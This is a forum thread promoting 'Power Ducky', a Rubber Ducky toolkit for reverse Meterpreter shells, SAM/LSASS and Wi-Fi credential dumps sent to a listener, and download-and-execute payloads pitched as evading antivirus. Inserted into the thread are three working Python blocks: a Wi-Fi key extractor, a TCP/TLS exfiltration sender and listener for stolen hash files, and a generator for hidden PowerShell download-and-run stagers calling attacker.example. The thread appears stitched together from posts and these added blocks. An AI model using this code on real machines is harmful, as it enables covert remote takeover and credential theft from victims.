
b00stfr3ak

Power Ducky ToolKit


This script is menu driven and will create the txt and bin file for you. When needed it will also set up a listener. Let me know what you guys think! Also, if anyone wants to add to the script, it should be pretty easy; all the files are separated for re-usability.

PowerShell Scripts for the Hak5 Ducky

1) Fast Meterpreter
2) Reverse Meterpreter
3) Dump Domain and Local Hashes
4) Dump Lsass Process
5) Dump Wifi Passwords
6) Wget Execute
99) Exit

All payloads are written in PowerShell, so nothing should be caught by AV.

https://github.com/b00stfr3ak/power-ducky

Fast Meterpreter
Stores the meterpreter script on a web server; the Ducky will then go grab the script using SSL and execute it on the victim's machine.

Reverse Meterpreter
Creates a reverse meterpreter shell through PowerShell injection.

Dump Domain and Local Hashes
Makes a copy of the SAM and SYSTEM files, and then dumps those files through a TCP socket to a listening server.

Dump Lsass Process
Dumps the LSASS process through PowerShell, then reads the file and dumps it through a TCP socket to a listening server.

Dump Wifi Passwords
Dumps all available Wi-Fi profiles, and then dumps each file through a TCP socket.

Wget Execute
Downloads a file and executes it on the victim's machine.
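The "Dump Wifi Passwords" item above sends each exported profile file to the listener. What follows is an added example, not code from the power-ducky project: a parser for the XML that `netsh wlan export profile key=clear` writes (the assumption here is that those exported profile files are what gets shipped), run over three constructed profiles. It pulls out SSID, security settings and the key, and distinguishes a cleartext passphrase from the DPAPI-protected blob you get when the export was done without `key=clear`.

```python
# Added example (not from the power-ducky project): parse the XML that
# "netsh wlan export profile key=clear" writes for each saved Wi-Fi profile
# and pull out SSID, security settings and the key.
import xml.etree.ElementTree as ET

# Constructed samples (not real networks): a WPA2-PSK profile exported with
# key=clear, the same profile exported without key=clear (key is then a
# DPAPI blob, placeholder hex below), and an open network with no key at all.
PSK_CLEAR = """<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>CorpGuest</name>
  <SSIDConfig><SSID><hex>436F72704775657374</hex><name>CorpGuest</name></SSID></SSIDConfig>
  <connectionType>ESS</connectionType>
  <connectionMode>auto</connectionMode>
  <MSM><security>
    <authEncryption>
      <authentication>WPA2PSK</authentication>
      <encryption>AES</encryption>
      <useOneX>false</useOneX>
    </authEncryption>
    <sharedKey>
      <keyType>passPhrase</keyType>
      <protected>false</protected>
      <keyMaterial>Guest-Pass-2013</keyMaterial>
    </sharedKey>
  </security></MSM>
</WLANProfile>"""

PSK_PROTECTED = (PSK_CLEAR
                 .replace("<protected>false</protected>", "<protected>true</protected>")
                 .replace("Guest-Pass-2013", "01000000D08C9DDF0115D1118C7A00C04FC297EB"))

OPEN = """<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>CoffeeShop</name>
  <SSIDConfig><SSID><name>CoffeeShop</name></SSID></SSIDConfig>
  <connectionType>ESS</connectionType>
  <MSM><security>
    <authEncryption>
      <authentication>open</authentication>
      <encryption>none</encryption>
      <useOneX>false</useOneX>
    </authEncryption>
  </security></MSM>
</WLANProfile>"""


def _text(node, path):
    found = node.find(path) if node is not None else None
    return found.text.strip() if found is not None and found.text else None


def parse_wlan_profile(xml_text):
    """Return a dict describing one exported profile."""
    root = ET.fromstring(xml_text)
    # The export carries the WLAN profile namespace and ElementTree needs it
    # on every path step, so derive it from the root tag instead of hard-coding.
    ns = root.tag[1:root.tag.index("}")] if root.tag.startswith("{") else ""

    def q(path):
        return "/".join(("{%s}%s" % (ns, p)) if ns else p for p in path.split("/"))

    ssid = _text(root, q("SSIDConfig/SSID/name"))
    if ssid is None:  # some exports only carry the hex form of the SSID
        hexssid = _text(root, q("SSIDConfig/SSID/hex"))
        ssid = bytes.fromhex(hexssid).decode("utf-8", "replace") if hexssid else None
    sec = root.find(q("MSM/security"))
    prof = {
        "name": _text(root, q("name")),
        "ssid": ssid,
        "auth": _text(sec, q("authEncryption/authentication")),
        "encryption": _text(sec, q("authEncryption/encryption")),
        "key": None,
        "key_state": "none",
    }
    shared = sec.find(q("sharedKey")) if sec is not None else None
    if shared is not None:
        prof["key"] = _text(shared, q("keyMaterial"))
        # protected=true means the export ran without key=clear: the value is a
        # DPAPI blob bound to that machine, not a passphrase you can reuse.
        prof["key_state"] = "dpapi" if _text(shared, q("protected")) == "true" else "clear"
    return prof


def collect_clear_keys(xml_texts):
    """SSID -> passphrase for every profile whose key came out in the clear."""
    out = {}
    for p in map(parse_wlan_profile, xml_texts):
        if p["key_state"] == "clear" and p["key"]:
            out[p["ssid"]] = p["key"]
    return out


if __name__ == "__main__":
    for x in (PSK_CLEAR, PSK_PROTECTED, OPEN):
        print(parse_wlan_profile(x))
```

The `key_state` field is the check worth keeping: a profile that arrives with `<protected>true</protected>` tells you the payload on the victim ran the export without `key=clear` (or without sufficient rights), and the blob it carries will not decrypt anywhere but on that host.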


The power-ducky toolkit has been updated to support SSL. Now you can transfer files from the victim to the attacker all encrypted. It does take a while with larger files, however it does work, and it happens in the background on the victim computer so they won't notice. Once the correct reg files are downloaded the script will print the hashes to the screen and write them to a file.
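The original post and the update above both describe the same mechanism: a dumped file is pushed from the victim through a TCP socket to a listening server, now optionally under SSL. The block below is an added example, not the power-ducky listener or its PowerShell sender, showing both ends of such a transfer in Python with framing (name, length, data, SHA-256 trailer) so the listener knows where a file ends and can tell whether it arrived intact. Data is streamed in chunks rather than read whole, which is what makes large LSASS dumps tolerable. TLS is layered on when certificate and key paths are supplied (those paths, and the loopback addresses, are assumptions for illustration); the self-check at the end runs the same framing over plain TCP on localhost.

```python
# Added example, not the power-ducky listener or sender: framed file transfer
# victim -> listener over TCP, optionally wrapped in TLS.
# Frame: 4-byte name length | name (UTF-8) | 8-byte data length | data | 32-byte SHA-256
import hashlib
import os
import socket
import ssl
import struct
import tempfile
import threading

CHUNK = 64 * 1024  # stream in pieces; an LSASS dump must not be held in memory whole


def recv_exact(sock, n):
    buf = bytearray()
    while len(buf) < n:
        part = sock.recv(n - len(buf))
        if not part:
            raise ConnectionError("peer closed mid-transfer")
        buf.extend(part)
    return bytes(buf)


def send_file(host, port, name, data, cafile=None):
    """Victim side. cafile (assumed path) pins the listener's certificate when TLS is used."""
    sock = socket.create_connection((host, port))
    if cafile:
        ctx = ssl.create_default_context(cafile=cafile)
        ctx.check_hostname = False  # listener is addressed by IP; trust rests on the pinned CA
        sock = ctx.wrap_socket(sock)
    with sock:
        name_b = name.encode("utf-8")
        sock.sendall(struct.pack(">I", len(name_b)) + name_b + struct.pack(">Q", len(data)))
        for i in range(0, len(data), CHUNK):
            sock.sendall(data[i:i + CHUNK])
        sock.sendall(hashlib.sha256(data).digest())


def recv_file(conn, out_dir):
    """Listener side: read one framed file, return (saved path, digest matched)."""
    (name_len,) = struct.unpack(">I", recv_exact(conn, 4))
    name = recv_exact(conn, name_len).decode("utf-8")
    (size,) = struct.unpack(">Q", recv_exact(conn, 8))
    # The sender chooses the name; keep only the basename so "..\..\x" cannot escape out_dir.
    path = os.path.join(out_dir, os.path.basename(name.replace("\\", "/")) or "unnamed")
    h = hashlib.sha256()
    with open(path, "wb") as f:
        remaining = size
        while remaining:
            chunk = conn.recv(min(CHUNK, remaining))
            if not chunk:
                raise ConnectionError("peer closed mid-transfer")
            f.write(chunk)
            h.update(chunk)
            remaining -= len(chunk)
    return path, recv_exact(conn, 32) == h.digest()


def start_listener(out_dir, host="127.0.0.1", port=0, certfile=None, keyfile=None):
    """Accept one connection in a background thread; returns (bound port, thread, result dict)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    bound_port = srv.getsockname()[1]
    result = {}

    def run():
        conn, _ = srv.accept()
        srv.close()
        if certfile:  # certfile/keyfile: assumed paths to the listener's TLS cert and key
            ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
            ctx.load_cert_chain(certfile, keyfile)
            conn = ctx.wrap_socket(conn, server_side=True)
        with conn:
            try:
                result["path"], result["ok"] = recv_file(conn, out_dir)
            except (ConnectionError, ssl.SSLError) as e:
                result["error"] = str(e)

    t = threading.Thread(target=run, daemon=True)
    t.start()
    return bound_port, t, result


def loopback_roundtrip(name, data):
    """Self-check over plain TCP on localhost: returns what the listener saved."""
    out_dir = tempfile.mkdtemp()
    port, thread, result = start_listener(out_dir)
    send_file("127.0.0.1", port, name, data)
    thread.join(30)
    with open(result["path"], "rb") as f:
        received = f.read()
    return {"ok": result["ok"], "saved_as": os.path.basename(result["path"]), "received": received}


if __name__ == "__main__":
    print(loopback_roundtrip("sam.hive", b"constructed sample bytes" * 1000))
```

Two checks that the plain "dump it through a socket" pattern lacks and that this version keeps: the trailing digest tells you whether a slow transfer over a flaky link actually completed, and the basename step stops a sender (or anyone who can reach the listener port) from choosing where on the attacking box the file lands.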


Fast Meterpreter has been added to the power-ducky toolkit. This payload stores a meterpreter script on a web server, and then all the Ducky has to do is download that script through SSL and execute it. The beauty of this script is that it is 10 lines long and the actual PowerShell command is less than 200 characters.

Ideas from:

http://www.pentestgeek.com/2013/09/18/invoke-shellcode/

https://forums.hak5.org/index.php?/topic/30398-payload-the-fastest-meterpreter-shell-youll-ever-get/


Has anyone tried this?

It looks good b00stfr3ak, please keep up the great work.

I would try it but I'm away for a few days.

When I get back and try it, I'll give some feedback as best I can.

I'm a bit new to the Ducky, and very glad to see people still coming up with stuff for it.


Have you tried implementing Invoke-Mimikatz, from PowerSploit?

This could be implemented. I would just need to ask if I could use his script.

Also, how does the dump domain hashes work? I thought you could only dump domain hashes from the NTDS.DIT file.

If a computer is on the domain, by default it keeps a number of cached credentials stored just in case the workstation can't talk to the domain controller.


Hey b00stfr3ak, it's factgasm here, also known as Noobero Uno :rolleyes: .

Could you put together a video to demonstrate the use of Power Ducky Toolkit, please? That would be unbelievably useful.

I dropped the inject.bin file on to my micro SD card then inserted that into a target machine via the Ducky and, hey presto, the script ran (hex encoded?).

I wasn't quite sure what to expect.

Once the script stopped running and the command shell closed, nothing obvious appeared to happen on the desktop. I assume the aim of the exploit was to allow a reverse shell to the attacking machine (among other things), which Darren covers in one of the Hak5 videos. If that's the case I'm going to have to revisit that video until I have the procedure down to a fine art.

You mention that it's possible to "6) Wget Execute".

Sounds excellent, that's exactly one of the things I want my Ducky to be able to do. However, in looking at the documentation I'm not sure how to go about tailoring the source code in order that it downloads the particular file I want from the particular source website, as it appears your source code is written in Ruby.

Please help!



It would be a good idea to create some videos on this, I just haven't had time. Can you clone the newest repo? This should get rid of the hex option (it was broken and took too much time). The best option to try is Fast Meterpreter. It is the fastest command and an instant meterpreter shell in memory (so no AV to worry about). Wget Execute is OK, but then you have to worry about dropping a binary file and not getting caught by AV.


I tried to make the videos today but they didn't turn out right. If anyone knows of a screen recording software for Linux that is low resource, please list it. I have updated the repo and tested it on a new Kali box and confirmed the scripts are working.


Is it possible to allow the script to set 'host ip' to a hostname as well?

Does the script fail with DNS names? It should just pass everything to Metasploit. I'll take a look tonight. I plan on re-writing the tool, because the code looks so bad.


Is it possible to have a sub-menu option to set the Meterpreter IPs on the fly (as I use a multi-hop VPN and my Metasploit IP can change)? Also, add an option to drop a file to load a new Meterpreter into memory at boot up.


b00stfr3ak,

Can you post some instructions on how to properly edit the files and what info is needed to get all of the options set up and running correctly? Greatly appreciated, keep up the AWESOME work!!


Hello b00stfr3ak

Powerducky is a great tool, however the latest version checked into GitHub has some issues...

It seems there was some syntax issue in the main menu, and the payload to add a user to the admin group fails, since the localadmin word is misspelled.

For the reverse shell attack I am able to make it work from the Rubber Ducky; the payload is injected and I got a message on my attacking machine (sending stage to victim xx bytes) but it hangs there... I tried to use the meterpreter x64 (since my victim machine uses an x64 architecture) but PowerShell just dies on the victim machine. It seems the payload needs to be specific for an x64 victim and your payload on GitHub is specific for 32 bits. Do you have a reverse shell payload for x64? Thank you...



Thanks, I fixed the add admin syntax and it has been pushed to GitHub.

What are the syntax issues with the main menu?

x32 works on x64 OS. It might have been a network issue, because the PowerShell code did reach the Metasploit server. I'm thinking about adding the option to not use a stager, but I'll have to do that later.

For any issues, can you post them to GitHub so I can keep track of them? Thanks!
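Two passages in this thread describe the same artifact: the Fast Meterpreter post (a Ducky file whose PowerShell command downloads a script over SSL and runs it, in under 200 characters) and the x64 exchange just above (a 32-bit stage on a 64-bit OS). The block below is an added example, not the power-ducky generator or any code from the project: it builds the Ducky Script text for such a download-and-run payload, encodes the command the way `powershell.exe -EncodedCommand` expects (UTF-16LE, then Base64), and selects the 32-bit PowerShell under `SysWOW64` when the staged shellcode is x86. The URL and host in the calls are placeholders; the `%SystemRoot%\SysWOW64` path, the PowerShell switches and the `ServerCertificateValidationCallback` override are real Windows/PowerShell behaviour, but using them this way is this example's choice, not something the thread states the toolkit does.

```python
# Added example, not the power-ducky generator: Ducky Script for a
# download-and-run PowerShell one-liner, with -EncodedCommand encoding and a
# 32-bit PowerShell option for x86 stages on 64-bit Windows.
import base64

# "powershell" resolves via PATH to the native (64-bit on x64) PowerShell.
# On 64-bit Windows the 32-bit PowerShell lives under SysWOW64; an x86
# Meterpreter stage injected into a 64-bit process will not run.
PS_X64 = "powershell"
PS_X86 = r"%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"

# Disables certificate validation for the download. A self-signed certificate
# on the staging web server otherwise makes DownloadString fail; the cost is
# that anyone who can intercept the connection can feed the victim a different script.
TRUST_ANY_CERT = "[Net.ServicePointManager]::ServerCertificateValidationCallback={$true};"


def download_and_run(url, trust_any_cert=False):
    """The PowerShell that fetches the staged script over HTTPS and executes it in memory."""
    ps = "IEX (New-Object Net.WebClient).DownloadString('%s')" % url
    return (TRUST_ANY_CERT + ps) if trust_any_cert else ps


def encode_command(ps):
    """UTF-16LE then Base64: the only form -EncodedCommand accepts."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


def decode_command(b64):
    """Inverse of encode_command; handy for reading back what a Ducky file will type."""
    return base64.b64decode(b64).decode("utf-16-le")


def _exe(arch):
    return PS_X86 if arch == "x86" else PS_X64


FLAGS = "-NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass"


def plain_command(url, arch="x64", trust_any_cert=False):
    """Shortest form: fewer characters means less time spent typing on the target."""
    return '%s %s -Command "%s"' % (_exe(arch), FLAGS, download_and_run(url, trust_any_cert))


def encoded_command(url, arch="x64", trust_any_cert=False):
    """Longer, but immune to quoting problems in the Run dialog."""
    return "%s %s -EncodedCommand %s" % (
        _exe(arch), FLAGS, encode_command(download_and_run(url, trust_any_cert)))


def ducky_script(url, arch="x64", encoded=False, trust_any_cert=False, boot_delay_ms=1000):
    """Ducky Script text: open the Run dialog and type the PowerShell command."""
    cmd = (encoded_command if encoded else plain_command)(url, arch, trust_any_cert)
    return "\n".join([
        "REM added example: download-and-run PowerShell stager",
        "DELAY %d" % boot_delay_ms,   # let the HID driver settle before typing
        "GUI r",
        "DELAY 500",
        "STRING " + cmd,
        "ENTER",
    ]) + "\n"


if __name__ == "__main__":
    # Placeholder staging URL; a DNS name works just as well as an IP here.
    print(ducky_script("https://10.0.0.5/a.ps1"))
    print(ducky_script("https://attacker.example/a.ps1", arch="x86", encoded=True))
```

The plain form of the command for a short URL comes in well under 200 characters, which matters because every character in a `STRING` line is a keystroke the Ducky has to type before the payload fires. The encoded form roughly triples the length, so reserve it for commands whose quoting the Run dialog mangles. If the reverse shell hangs right after "sending stage" on a 64-bit victim, the `arch="x86"` variant (or a 64-bit stage in the native PowerShell) is the first thing to try.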



How do I set this up to work on the Ducky?
